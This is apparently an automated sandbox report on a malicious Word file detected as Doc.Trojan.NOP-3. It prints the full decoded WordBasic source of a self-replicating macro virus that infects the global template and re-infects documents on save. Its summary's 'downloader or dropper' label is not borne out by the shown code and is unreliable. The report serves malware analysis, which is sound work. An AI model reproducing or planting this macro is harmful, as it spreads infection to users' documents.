MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file contains a legacy WordBasic macro that executes the AutoOpen subroutine. This subroutine copies itself and another macro, then saves the current document with its original filename. This behavior is indicative of a downloader or dropper mechanism, though the specific payload is not evident. The ClamAV detection further supports its malicious nature.
Heuristics 4
-
ClamAV: Doc.Trojan.NOP-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.NOP-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1182 bytes |
SHA-256: e287573614cc68142e18ebba9d4938328cf6c6494f37745efa2453176b9b81da |
|||
|
Detection
ClamAV:
Doc.Trojan.NOP-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Speichert die aktuelle Datei oder Dokumentvorlage."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN"
Dim m$
WordBasic.ToolsOptionsSave GlobalDotPrompt:=0
m$ = WordBasic.[FileName$]() + ":TAOA"
WordBasic.MacroCopy m$, "Global:DateiSpeichern"
m$ = WordBasic.[FileName$]() + ":AutoOpen"
WordBasic.MacroCopy m$, "Global:TAOA"
End Sub
Attribute VB_Name = "TAOA"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Speichert die aktuelle Datei oder Dokumentvorlage."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.TAOA.MAIN"
Dim m$
m$ = WordBasic.[FileName$]() + ":AutoOpen"
WordBasic.MacroCopy "Global:TAOA", m$
m$ = WordBasic.[FileName$]() + ":TAOA"
WordBasic.MacroCopy "Global:DateiSpeichern", m$
WordBasic.FileSaveAs Name:=WordBasic.[FileName$](), Format:=1
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.